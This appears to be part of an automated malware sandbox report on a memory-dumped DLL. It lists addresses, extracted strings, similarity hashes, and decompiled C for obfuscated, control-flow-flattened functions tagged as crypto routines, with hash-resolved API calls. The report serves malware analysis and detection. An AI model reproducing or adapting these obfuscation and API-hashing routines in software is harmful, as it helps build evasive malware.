0x10005325
0x1000532c
0x10005330
0x00000000
0x10005330
0x1000551b
0x1000551d
0x1000555a
0x00000000
0x1000555a
0x1000551f
0x10005544
0x10005549
0x1000554c
0x1000554e
0x00000000
0x00000000
0x10005550
0x00000000
0x1000555f
0x1000555f
0x1000555f
0x00000000
0x10005269
0x10005264

Strings

av, xrefs: 1000525F
'}, xrefs: 10004ECE
av, xrefs: 10005509
B, xrefs: 100051E2
mOc, xrefs: 10004C86
>, xrefs: 10004A3C
^, xrefs: 100051F2
bo9, xrefs: 10004A8A
n}\, xrefs: 10004F4C
av, xrefs: 100054C4
ZgA, xrefs: 1000502B
kPN, xrefs: 10004E22
o|, xrefs: 10004D68

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: '}$>$B$ZgA$bo9$kPN$n}\$o|$^$av$av$av$mOc
API String ID: 0-1908506846
Opcode ID: 69ce8febdc610eb59fee16586d3a2504b44535a9522c0373cc8a241b1509f65c
Instruction ID: 6eedb9681ac89ebe1d834fbab6a21efd0f84cbe31469f8e6679c511fbb023aa3
Opcode Fuzzy Hash: 69ce8febdc610eb59fee16586d3a2504b44535a9522c0373cc8a241b1509f65c
Instruction Fuzzy Hash: 6F420F715093818FE3B8CF61C54AA9BBBE1FBC4748F10891DE1DA96260DBB58948CF53

Uniqueness

Uniqueness Score: -1.00%

Function 1001514C, Relevance: 14.3, Strings: 11, Instructions: 589
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1001514C(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr* _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				intOrPtr* _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				unsigned int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* _t621;
				void* _t622;
				signed int _t632;
				int _t638;
				intOrPtr _t656;
				intOrPtr _t666;
				void* _t667;
				signed int _t672;
				signed int _t673;
				intOrPtr _t674;
				intOrPtr* _t681;
				intOrPtr* _t682;
				signed int _t697;
				void* _t737;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				signed int _t757;
				signed int _t758;
				signed int _t759;
				signed int _t760;
				intOrPtr _t761;
				void* _t762;
				void* _t765;
				void* _t767;
				signed int _t771;
				intOrPtr _t772;
				signed int* _t773;
				void* _t778;

				_t773 =  &_v548;
				_v464 = 0x747c8f;
				_v464 = _v464 << 4;
				_v464 = _v464 ^ 0xf282766d;
				_v464 = _v464 ^ 0xf5c5be9d;
				_v364 = 0xb532f8;
				_v300 = __edx;
				_t765 = 0xe5d9b8e;
				_v484 = __ecx;
				_t750 = 0x41;
				_v364 = _v364 / _t750;
				_v364 = _v364 ^ 0x000d157a;
				_v504 = 0xe6055d;
				_t751 = 0x31;
				_v504 = _v504 * 0x64;
				_v504 = _v504 * 0x4d;
				_v504 = _v504 << 3;
				_v504 = _v504 ^ 0x34cd3536;
				_v520 = 0x64201a;
				_v520 = _v520 ^ 0x8f5417a8;
				_v520 = _v520 | 0xc5c04492;
				_v520 = _v520 / _t751;
				_v520 = _v520 ^ 0x04375741;
				_v412 = 0xa26f60;
				_v412 = _v412 | 0x66704ceb;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xde4b6a97;
				_v508 = 0x207147;
				_v508 = _v508 >> 0xd;
				_v508 = _v508 >> 0xa;
				_v508 = _v508 + 0xf61e;
				_v508 = _v508 ^ 0x000fabd0;
				_v476 = 0x5fb752;
				_v476 = _v476 << 0xd;
				_v476 = _v476 + 0xfffff8b3;
				_v476 = _v476 ^ 0xf6e1bc3a;
				_v472 = 0xc0259f;
				_v472 = _v472 >> 0x10;
				_t752 = 0x48;
				_v472 = _v472 / _t752;
				_v472 = _v472 ^ 0x0004181a;
				_v320 = 0xfb3cee;
				_t672 = 0x1a;
				_v320 = _v320 * 0x5d;
				_v320 = _v320 ^ 0x5b479eba;
				_v384 = 0x382a72;
				_v384 = _v384 + 0xffffddec;
				_v384 = _v384 ^ 0x0031fe5f;
				_v332 = 0x55d0b4;
				_v332 = _v332 ^ 0x3ff06403;
				_v332 = _v332 ^ 0x3fa8931f;
				_v448 = 0x85a556;
				_v448 = _v448 >> 0xe;
				_v448 = _v448 * 0x1f;
				_v448 = _v448 ^ 0x000b8b98;
				_v456 = 0xb49955;
				_v456 = _v456 / _t672;
				_t753 = 0x29;
				_v456 = _v456 / _t753;
				_v456 = _v456 ^ 0x000e8987;
				_v376 = 0x128d75;
				_v376 = _v376 | 0xd0125e02;
				_v376 = _v376 ^ 0xd013a90a;
				_v500 = 0x28b469;
				_v500 = _v500 >> 0x10;
				_v500 = _v500 | 0x6d310607;
				_v500 = _v500 >> 0xd;
				_v500 = _v500 ^ 0x000db073;
				_v488 = 0x6098a3;
				_t771 = 0x1b;
				_t673 = 0x23;
				_v488 = _v488 * 0x21;
				_t754 = 0x4b;
				_v488 = _v488 * 0x31;
				_v488 = _v488 / _t771;
				_v488 = _v488 ^ 0x03afbcf7;
				_v460 = 0x20aa51;
				_v460 = _v460 * 0x4c;
				_v460 = _v460 ^ 0xee30b9d4;
				_v460 = _v460 ^ 0xe780a71e;
				_v428 = 0xa93e36;
				_v428 = _v428 >> 0xf;
				_v428 = _v428 << 3;
				_v428 = _v428 ^ 0x0008152e;
				_v348 = 0x35e29f;
				_v348 = _v348 / _t673;
				_v348 = _v348 ^ 0x0008bd34;
				_v512 = 0xeab558;
				_v512 = _v512 ^ 0x2c6e6afc;
				_v512 = _v512 >> 0xc;
				_v512 = _v512 ^ 0x9cfb0454;
				_v512 = _v512 ^ 0x9cf14a0e;
				_v380 = 0xd3c3ae;
				_v380 = _v380 * 0x68;
				_v380 = _v380 ^ 0x560c237d;
				_v316 = 0x47fb42;
				_t755 = 0x62;
				_v316 = _v316 / _t754;
				_v316 = _v316 ^ 0x000185b8;
				_v544 = 0x41a1fa;
				_v544 = _v544 >> 5;
				_v544 = _v544 / _t755;
				_t756 = 0x65;
				_v544 = _v544 * 0x3b;
				_v544 = _v544 ^ 0x000a84de;
				_v388 = 0x54fa60;
				_v388 = _v388 ^ 0xc9327523;
				_v388 = _v388 ^ 0xc968711e;
				_v496 = 0x39ecb1;
				_v496 = _v496 + 0xffff1711;
				_v496 = _v496 >> 0x10;
				_v496 = _v496 / _t756;
				_v496 = _v496 ^ 0x0008752c;
				_v536 = 0x2b1b71;
				_v536 = _v536 + 0x5ae6;
				_v536 = _v536 + 0x198f;
				_v536 = _v536 + 0xffff3003;
				_v536 = _v536 ^ 0x002bda43;
				_v324 = 0x47cd80;
				_v324 = _v324 + 0x1503;
				_v324 = _v324 ^ 0x0048a882;
				_v372 = 0x20b4a5;
				_v372 = _v372 + 0xffff6264;
				_v372 = _v372 ^ 0x002c1f73;
				_v440 = 0xb5ccb0;
				_v440 = _v440 << 0xb;
				_v440 = _v440 + 0xffff529b;
				_v440 = _v440 ^ 0xae6c1435;
				_v528 = 0x37c1a9;
				_v528 = _v528 ^ 0x937d0434;
				_v528 = _v528 >> 7;
				_v528 = _v528 | 0x44368e7e;
				_v528 = _v528 ^ 0x45331a30;
				_v420 = 0x633e68;
				_v420 = _v420 >> 0xf;
				_v420 = _v420 | 0xde42a33e;
				_v420 = _v420 ^ 0xde401b19;
				_v312 = 0xbe180e;
				_v312 = _v312 + 0xffff7e2d;
				_v312 = _v312 ^ 0x00b7ee3e;
				_v452 = 0x2aacd9;
				_v452 = _v452 << 3;
				_v452 = _v452 + 0xffff1e56;
				_v452 = _v452 ^ 0x01526ad1;
				_v396 = 0x9e98ac;
				_v396 = _v396 + 0xffff4f74;
				_v396 = _v396 + 0xffffc934;
				_v396 = _v396 ^ 0x00985acb;
				_v532 = 0x4d455a;
				_v532 = _v532 << 0xe;
				_v532 = _v532 | 0xe91c990e;
				_v532 = _v532 >> 5;
				_v532 = _v532 ^ 0x07c67648;
				_v340 = 0x15a7e5;
				_v340 = _v340 + 0x22cd;
				_v340 = _v340 ^ 0x00137c12;
				_v540 = 0xe2019f;
				_v540 = _v540 + 0xe5f2;
				_v540 = _v540 | 0xf85f042b;
				_v540 = _v540 + 0xd87;
				_v540 = _v540 ^ 0xf8f221fc;
				_v404 = 0xd54be2;
				_v404 = _v404 >> 9;
				_v404 = _v404 + 0xfec5;
				_v404 = _v404 ^ 0x00007dde;
				_v444 = 0x79be1c;
				_t757 = 0x70;
				_v444 = _v444 * 0x4c;
				_v444 = _v444 * 0x71;
				_v444 = _v444 ^ 0xf41c68bd;
				_v548 = 0x1f87ed;
				_v548 = _v548 + 0x2c1f;
				_v548 = _v548 | 0xd23c0928;
				_v548 = _v548 + 0xffff81c9;
				_v548 = _v548 ^ 0xd23ad885;
				_v516 = 0x634d6b;
				_t324 =  &_v516; // 0x634d6b
				_v516 =  *_t324 / _t757;
				_v516 = _v516 + 0x32a;
				_v516 = _v516 | 0x99df79f2;
				_v516 = _v516 ^ 0x99d80212;
				_v524 = 0x17051a;
				_v524 = _v524 | 0x03811271;
				_v524 = _v524 ^ 0xd01555ee;
				_v524 = _v524 + 0xffff5b9f;
				_v524 = _v524 ^ 0xd386f17b;
				_v436 = 0xd45d54;
				_v436 = _v436 / _t771;
				_t758 = 0x1f;
				_v436 = _v436 * 0x61;
				_v436 = _v436 ^ 0x02f244f0;
				_v304 = 0xb8df13;
				_v304 = _v304 + 0x3f11;
				_v304 = _v304 ^ 0x00bcecc7;
				_v356 = 0x906650;
				_v356 = _v356 ^ 0x00a97857;
				_v356 = _v356 ^ 0x00343802;
				_v468 = 0xeff49c;
				_v468 = _v468 + 0xffff1575;
				_v468 = _v468 / _t673;
				_v468 = _v468 ^ 0x000d2ae2;
				_v308 = 0x6e48c8;
				_v308 = _v308 << 5;
				_v308 = _v308 ^ 0x0dccc6b7;
				_v480 = 0xd0e39e;
				_v480 = _v480 << 5;
				_v480 = _v480 << 5;
				_v480 = _v480 ^ 0x43840078;
				_v360 = 0x95c451;
				_v360 = _v360 / _t758;
				_v360 = _v360 ^ 0x0006b88f;
				_v492 = 0x6da9a8;
				_v492 = _v492 + 0xdaca;
				_t759 = 0x1a;
				_v492 = _v492 * 0x21;
				_v492 = _v492 * 0x6a;
				_v492 = _v492 ^ 0xe6174af0;
				_v368 = 0x614359;
				_v368 = _v368 >> 2;
				_v368 = _v368 ^ 0x00135105;
				_v352 = 0xfef83c;
				_v352 = _v352 >> 0xf;
				_v352 = _v352 ^ 0x000a0299;
				_v424 = 0x5a7a53;
				_v424 = _v424 << 0xd;
				_v424 = _v424 + 0xffffcdc3;
				_v424 = _v424 ^ 0x4f42da32;
				_v432 = 0xe30905;
				_v432 = _v432 / _t759;
				_v432 = _v432 + 0xcd4f;
				_v432 = _v432 ^ 0x00044c4b;
				_v344 = 0xe288e7;
				_v344 = _v344 << 0xd;
				_v344 = _v344 ^ 0x511ff13e;
				_v408 = 0x13ed81;
				_v408 = _v408 ^ 0x5377d071;
				_t760 = 0x2e;
				_v408 = _v408 / _t760;
				_v408 = _v408 ^ 0x01dfbfeb;
				_v416 = 0xbf1b64;
				_v416 = _v416 + 0xfffffea4;
				_v416 = _v416 * 0x78;
				_v416 = _v416 ^ 0x5995031a;
				_v328 = 0x6398af;
				_v328 = _v328 << 0xd;
				_v328 = _v328 ^ 0x731be279;
				_t761 = _v300;
				_t674 = _v300;
				_t772 = _v300;
				_v336 = 0x10c8c;
				_v336 = _v336 << 1;
				_v336 = _v336 ^ 0x000819e8;
				_v392 = 0xb6c78c;
				_v392 = _v392 ^ 0x13b96861;
				_v392 = _v392 + 0xbe7e;
				_v392 = _v392 ^ 0x13144a50;
				_v400 = 0x5467f4;
				_v400 = _v400 | 0xf0b76502;
				_v400 = _v400 >> 2;
				_v400 = _v400 ^ 0x3c3e8391;
				while(1) {
					L1:
					_t621 = 0x5dcefd1;
					do {
						while(1) {
							L2:
							_t778 = _t765 - _t621;
							if(_t778 > 0) {
								break;
							}
							if(_t778 == 0) {
								_push(_v396);
								_push(_v452);
								_v292 = _t761 + _t772;
								_push(_v312);
								_t674 = E10009B4D(_t772,  &_v288, _v340, _v540, _t761 + _t772 - _t772,  &_v256,  &_v128, _v404, E10008650(_v420, 0x10001604), _v444, _v548) + _t772;
								E1000B952(_v516, _t646, _v524, _v436);
								_t773 =  &(_t773[0xf]);
								_t765 = 0x15739eb;
								L10:
								_t682 = _v484;
								while(1) {
									L1:
									_t621 = 0x5dcefd1;
									goto L2;
								}
							}
							if(_t765 != 0x4ba74a) {
								if(_t765 == 0x15739eb) {
									E100168F4( *((intOrPtr*)(_t682 + 4)), _t674, _v304, _v356, _v468,  *_t682, _v308);
									_t682 = _v484;
									_t773 =  &(_t773[5]);
									_t765 = 0x76ea945;
									_t674 = _t674 +  *((intOrPtr*)(_t682 + 4));
									goto L1;
								} else {
									if(_t765 == 0x41f21e8) {
										_t761 = E10017E33(8, 1);
										_push(9);
										_push(_t761);
										_push(_v412);
										E10010204(_v520,  &_v288);
										_t773 =  &(_t773[5]);
										_t765 = 0xf35de2f;
										goto L10;
									} else {
										if(_t765 == 0x4e02d18) {
											_t761 = _t761 +  *((intOrPtr*)(_t682 + 4));
											_push(_t682);
											_t666 = E100134E7(_t682, _t761);
											_t682 = _v484;
											_t772 = _t666;
											_t773 =  &(_t773[3]);
											_t621 = 0x5dcefd1;
											_t765 =  !=  ? 0x5dcefd1 : 0xd4bc0b6;
											continue;
										} else {
											if(_t765 != 0x58633e2) {
												goto L28;
											} else {
												_push(_v544);
												_push(_v316);
												_push(_v380);
												_t667 = E1000416C(_v512, 0x100015a4);
												_push( &_v256);
												_push(_t667);
												_push(_t761);
												_push(_v296);
												 *((intOrPtr*)(E1002272A(0xbb443524, 0x9a)))();
												E1000B952(_v388, _t667, _v496, _v536);
												_t773 =  &(_t773[9]);
												_t765 = 0x4e02d18;
												goto L10;
											}
										}
									}
								}
								L30:
								return _t656;
							}
							_t761 = 0x4000;
							_push(_t682);
							_t656 = E100134E7(_t682, 0x4000);
							_t773 =  &(_t773[3]);
							_v296 = _t656;
							if(_t656 != 0) {
								_t765 = 0x58633e2;
								goto L10;
							}
							goto L30;
						}
						if(_t765 == 0x76ea945) {
							_push(_v368);
							_push(_v492);
							_push(_v360);
							_t622 = E10008650(_v480, 0x10001514);
							_t674 = _t674 + E10004079(_v292 - _t674, _v352, _v424, _v432, _t674,  &_v256);
							E1000B952(_v344, _t622, _v408, _v416);
							_t681 = _v300;
							_t773 =  &(_t773[0xa]);
							_t765 = 0xafa7256;
							 *((intOrPtr*)(_t681 + 4)) = _t674 - _t772;
							_t621 = 0x5dcefd1;
							 *_t681 = _t772;
							_t682 = _v484;
							goto L28;
						} else {
							if(_t765 == 0xab6c65d) {
								_t767 =  &_v256;
								_t737 = E10017E33(0x10, 8);
								_t632 = _v464;
								if(_t632 < _t737) {
									_t749 = _t737 - _t632;
									_t762 = _t767;
									_t697 = _t749 >> 1;
									_t638 = memset(_t762, 0x2d002d, _t697 << 2);
									asm("adc ecx, ecx");
									_t767 = _t767 + _t749 * 2;
									memset(_t762 + _t697, _t638, 0);
									_t773 =  &(_t773[6]);
								}
								_t761 = E10017E33(0x10, 8);
								_push(0xb);
								_push(_t761);
								_push(_v500);
								E10010204(_v376, _t767);
								_t773 =  &(_t773[5]);
								_t765 = 0x4ba74a;
								goto L10;
							} else {
								if(_t765 == 0xd4bc0b6) {
									E100088FC(_v328, _v336, _v392, _v400, _v296);
									return 0;
								}
								if(_t765 == 0xe5d9b8e) {
									_t765 = 0x41f21e8;
									goto L2;
								} else {
									if(_t765 != 0xf35de2f) {
										goto L28;
									} else {
										_t761 = E10017E33(0x10, 4);
										_push(0xb);
										_push(_t761);
										_push(_v320);
										E10010204(_v472,  &_v128);
										_t773 =  &(_t773[5]);
										_t765 = 0xab6c65d;
										goto L10;
									}
								}
							}
						}
						goto L30;
						L28:
					} while (_t765 != 0xafa7256);
					return _v296;
				}
			}

0x1001514c
0x10015152
0x1001515a
0x1001515f
0x10015167
0x1001516f
0x10015185
0x1001518c
0x10015195
0x10015199
0x1001519e
0x100151a7
0x100151b2
0x100151bf
0x100151c2
0x100151cb
0x100151cf
0x100151d4
0x100151dc
0x100151e4
0x100151ec
0x100151fc
0x10015200
0x10015208
0x10015213
0x1001521e
0x10015226
0x10015231
0x10015239
0x1001523e
0x10015243
0x1001524b
0x10015253
0x1001525b
0x10015260
0x10015268
0x10015270
0x10015278
0x10015281
0x10015286
0x1001528c
0x10015294
0x100152a7
0x100152a8
0x100152af
0x100152ba
0x100152c5
0x100152d0
0x100152db
0x100152e6
0x100152f1
0x100152fc
0x10015304
0x1001530e
0x10015312
0x1001531a
0x10015328
0x10015332
0x10015339
0x1001533f
0x10015347
0x10015352
0x1001535d
0x10015368
0x10015370
0x10015375
0x1001537d
0x10015382
0x1001538a
0x10015397
0x1001539a
0x1001539d
0x100153a6
0x100153a9
0x100153b5
0x100153b9
0x100153c1
0x100153ce
0x100153d2
0x100153da
0x100153e2
0x100153ed
0x100153f5
0x100153fd
0x10015408
0x1001541e
0x10015425
0x10015430
0x10015438
0x10015440
0x10015445
0x1001544d
0x10015455
0x10015468
0x1001546f
0x1001547a
0x1001548e
0x1001548f
0x10015498
0x100154a3
0x100154ab
0x100154b8
0x100154c1
0x100154c2
0x100154c6
0x100154ce
0x100154d9
0x100154e4
0x100154ef
0x100154f7
0x100154ff
0x1001550e
0x10015514
0x1001551c
0x10015524
0x1001552c
0x10015534
0x1001553c
0x10015544
0x1001554f
0x1001555a
0x10015565
0x10015570
0x1001557b
0x10015586
0x10015591
0x10015599
0x100155a4
0x100155af
0x100155b7
0x100155bf
0x100155c4
0x100155cc
0x100155d4
0x100155df
0x100155e7
0x100155f2
0x100155fd
0x10015608
0x10015613
0x1001561e
0x10015626
0x1001562b
0x10015633
0x1001563b
0x10015646
0x10015651
0x1001565c
0x10015667
0x1001566f
0x10015674
0x1001567c
0x10015681
0x10015689
0x10015694
0x1001569f
0x100156aa
0x100156b2
0x100156ba
0x100156c2
0x100156ca
0x100156d2
0x100156dd
0x100156e5
0x100156f0
0x100156fb
0x10015708
0x10015709
0x10015712
0x10015716
0x1001571e
0x10015726
0x1001572e
0x10015736
0x1001573e
0x10015746
0x1001574e
0x10015754
0x10015758
0x10015760
0x10015768
0x10015770
0x10015778
0x10015780
0x10015788
0x10015790
0x10015798
0x100157b0
0x100157c1
0x100157c4
0x100157cb
0x100157d6
0x100157e1
0x100157ec
0x100157f7
0x10015802
0x1001580d
0x10015818
0x10015820
0x10015830
0x10015834
0x1001583c
0x10015847
0x1001584f
0x1001585a
0x10015862
0x10015867
0x1001586c
0x10015874
0x1001588a
0x10015891
0x1001589c
0x100158a4
0x100158b1
0x100158b4
0x100158bd
0x100158c1
0x100158c9
0x100158d4
0x100158dc
0x100158e7
0x100158f2
0x100158fa
0x10015905
0x10015910
0x10015918
0x10015923
0x1001592e
0x10015944
0x1001594b
0x10015956
0x10015961
0x1001596c
0x10015974
0x1001597f
0x1001598a
0x1001599c
0x1001599f
0x100159a6
0x100159b1
0x100159bc
0x100159cf
0x100159d6
0x100159e1
0x100159ec
0x100159f4
0x100159ff
0x10015a06
0x10015a0d
0x10015a14
0x10015a1f
0x10015a26
0x10015a31
0x10015a3c
0x10015a47
0x10015a52
0x10015a5d
0x10015a68
0x10015a73
0x10015a7b
0x10015a86
0x10015a86
0x10015a86
0x10015a8b
0x10015a8b
0x10015a8b
0x10015a8b
0x10015a8d
0x00000000
0x00000000
0x10015a93
0x10015c33
0x10015c42
0x10015c46
0x10015c4d
0x10015cb7
0x10015cba
0x10015cbf
0x10015cc2
0x10015b37
0x10015b37
0x10015a86
0x10015a86
0x10015a86
0x00000000
0x10015a86
0x10015a86
0x10015a9f
0x10015aab
0x10015bdb
0x10015be0
0x10015be4
0x10015be7
0x10015bec
0x00000000
0x10015ab1
0x10015ab7
0x10015b92
0x10015b9b
0x10015b9d
0x10015b9e
0x10015ba9
0x10015bae
0x10015bb1
0x00000000
0x10015abd
0x10015ac3
0x10015b48
0x10015b59
0x10015b5c
0x10015b61
0x10015b65
0x10015b67
0x10015b71
0x10015b76
0x00000000
0x10015ac5
0x10015acb
0x00000000
0x10015ad1
0x10015ad1
0x10015ada
0x10015ae1
0x10015aec
0x10015b02
0x10015b03
0x10015b04
0x10015b05
0x10015b17
0x10015b2a
0x10015b2f
0x10015b32
0x00000000
0x10015b32
0x10015acb
0x10015ac3
0x10015ab7
0x10015e66
0x10015e66
0x10015e66
0x10015bfb
0x10015c0f
0x10015c12
0x10015c17
0x10015c1a
0x10015c23
0x10015c29
0x00000000
0x10015c29
0x00000000
0x10015c23
0x10015cd2
0x10015dba
0x10015dc6
0x10015dca
0x10015dd5
0x10015e13
0x10015e23
0x10015e28
0x10015e31
0x10015e34
0x10015e3b
0x10015e3e
0x10015e43
0x10015e45
0x00000000
0x10015cd8
0x10015cde
0x10015d4b
0x10015d62
0x10015d64
0x10015d6c
0x10015d6e
0x10015d70
0x10015d79
0x10015d7b
0x10015d7d
0x10015d7f
0x10015d82
0x10015d82
0x10015d82
0x10015d96
0x10015d9a
0x10015d9c
0x10015d9d
0x10015da8
0x10015dad
0x10015db0
0x00000000
0x10015ce0
0x10015ce6
0x10015e8a
0x00000000
0x10015e92
0x10015cf2
0x10015d3a
0x00000000
0x10015cf4
0x10015cfa
0x00000000
0x10015d00
0x10015d11
0x10015d1a
0x10015d1c
0x10015d1d
0x10015d28
0x10015d2d
0x10015d30
0x00000000
0x10015d30
0x10015cfa
0x10015cf2
0x10015cde
0x00000000
0x10015e49
0x10015e49
0x00000000
0x10015e55

Strings

ZEM, xrefs: 10015667
h>c, xrefs: 100155D4
x, xrefs: 1001586C
SzZ, xrefs: 10015905
Z, xrefs: 10015524
*, xrefs: 10015834
r*8, xrefs: 100152BA
YCa, xrefs: 100158C9
Gq , xrefs: 10015231
kMc, xrefs: 1001574E
Lpf, xrefs: 10015213

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Gq $SzZ$YCa$ZEM$h>c$kMc$r*8$x$*$Lpf$Z
API String ID: 0-524704540
Opcode ID: 755f97d6dda3e2f48e1462079eb0b40fc94269c58dda40b1855aaa8874fdca0c
Instruction ID: e5592656cda742f9488aaef9debab09b50c33c43b02b2e36867511ea8dc93d9a
Opcode Fuzzy Hash: 755f97d6dda3e2f48e1462079eb0b40fc94269c58dda40b1855aaa8874fdca0c
Instruction Fuzzy Hash: 5C620F725083808BD374CF25C58AB8BBBE1FBD4754F10892DE6DA9A260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10021033, Relevance: 14.2, Strings: 11, Instructions: 440
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10021033(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v80;
				char _v88;
				intOrPtr _v92;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				unsigned int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				void* _t458;
				intOrPtr _t469;
				signed int _t472;
				void* _t473;
				void* _t481;
				intOrPtr* _t485;
				void* _t487;
				signed char* _t502;
				signed char* _t539;
				intOrPtr* _t542;
				intOrPtr _t543;
				intOrPtr _t544;
				void* _t545;
				signed char* _t546;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				intOrPtr _t561;
				signed int* _t563;
				void* _t567;

				_t485 = _a8;
				_push(_a12);
				_t542 = __edx;
				_v100 = __ecx;
				_push(_t485);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(__ecx);
				_v252 = 0x297379;
				_t563 =  &(( &_v272)[5]);
				_v252 = _v252 | 0x482ae0ab;
				_v252 = _v252 + 0xffff2f2c;
				_t543 = 0;
				_v252 = _v252 + 0xffff7631;
				_t487 = 0x3cf250d;
				_v252 = _v252 ^ 0x482a9958;
				_v132 = 0xa3b59d;
				_v132 = _v132 ^ 0x33b52091;
				_v132 = _v132 ^ 0x3316954c;
				_v260 = 0xcd19f4;
				_t548 = 0x30;
				_v260 = _v260 / _t548;
				_v260 = _v260 + 0x7ee5;
				_t549 = 0x60;
				_v260 = _v260 / _t549;
				_v260 = _v260 ^ 0x00000cf7;
				_v272 = 0x42bc32;
				_t550 = 0x16;
				_v272 = _v272 / _t550;
				_v272 = _v272 + 0xffffb51b;
				_v272 = _v272 >> 0xf;
				_v272 = _v272 ^ 0x0000157a;
				_v188 = 0x959f00;
				_t551 = 0x35;
				_v188 = _v188 / _t551;
				_v188 = _v188 ^ 0x8a6dc0bd;
				_v188 = _v188 ^ 0x8a6b8956;
				_v164 = 0x10910e;
				_v164 = _v164 + 0x50ec;
				_v164 = _v164 >> 1;
				_v164 = _v164 ^ 0x000c3ad3;
				_v196 = 0xff01ae;
				_v196 = _v196 | 0x16565b7e;
				_t552 = 0x47;
				_v104 = 0;
				_v196 = _v196 * 0x46;
				_v196 = _v196 ^ 0x49d67457;
				_v184 = 0x4f527;
				_v184 = _v184 / _t552;
				_v184 = _v184 + 0xaaba;
				_v184 = _v184 ^ 0x00090e69;
				_v192 = 0xd87e4;
				_v192 = _v192 + 0xba4a;
				_v192 = _v192 << 0xf;
				_v192 = _v192 ^ 0x211ae5b8;
				_v232 = 0x15a9bc;
				_v232 = _v232 + 0x19ea;
				_v232 = _v232 | 0xbc8b77dc;
				_v232 = _v232 + 0xbfcb;
				_v232 = _v232 ^ 0xbca36d47;
				_v216 = 0xc01e65;
				_v216 = _v216 << 0xa;
				_t553 = 0x48;
				_v216 = _v216 / _t553;
				_v216 = _v216 ^ 0x000584f8;
				_v108 = 0xe9cbd7;
				_v108 = _v108 << 0xd;
				_v108 = _v108 ^ 0x39762ee5;
				_v256 = 0x8a3b9f;
				_t554 = 0x1d;
				_v256 = _v256 * 0x14;
				_v256 = _v256 >> 5;
				_v256 = _v256 >> 3;
				_v256 = _v256 ^ 0x000a41a1;
				_v264 = 0x8f643b;
				_v264 = _v264 << 1;
				_v264 = _v264 + 0x9c80;
				_v264 = _v264 << 9;
				_v264 = _v264 ^ 0x3ecd0f11;
				_v220 = 0x26af8d;
				_v220 = _v220 << 8;
				_v220 = _v220 + 0x82fa;
				_v220 = _v220 ^ 0x26b9c81c;
				_v208 = 0x6795f1;
				_v208 = _v208 >> 0xf;
				_v208 = _v208 ^ 0xfad1c0c1;
				_v208 = _v208 ^ 0xfad055bf;
				_v140 = 0x91e449;
				_v140 = _v140 << 4;
				_v140 = _v140 ^ 0x0911bbcb;
				_v148 = 0x4fd844;
				_v148 = _v148 * 0x65;
				_v148 = _v148 ^ 0x1f8af41d;
				_v152 = 0x4b5c39;
				_t161 =  &_v152; // 0x4b5c39
				_v152 =  *_t161 / _t554;
				_v152 = _v152 ^ 0x000648a0;
				_v120 = 0x2c3eff;
				_v120 = _v120 + 0xffff343d;
				_v120 = _v120 ^ 0x002df28b;
				_v172 = 0x1f4c4b;
				_v172 = _v172 ^ 0xae3bf12d;
				_v172 = _v172 | 0xb3de93c3;
				_v172 = _v172 ^ 0xbff7bef1;
				_v244 = 0xe86510;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 | 0x4bfed319;
				_v244 = _v244 + 0xeaae;
				_v244 = _v244 ^ 0x4bfb34c7;
				_v268 = 0x5b60cc;
				_t555 = 0x13;
				_v268 = _v268 / _t555;
				_v268 = _v268 ^ 0x87e5a65c;
				_t556 = 0x35;
				_v268 = _v268 * 3;
				_v268 = _v268 ^ 0x97aeadc0;
				_v144 = 0x998720;
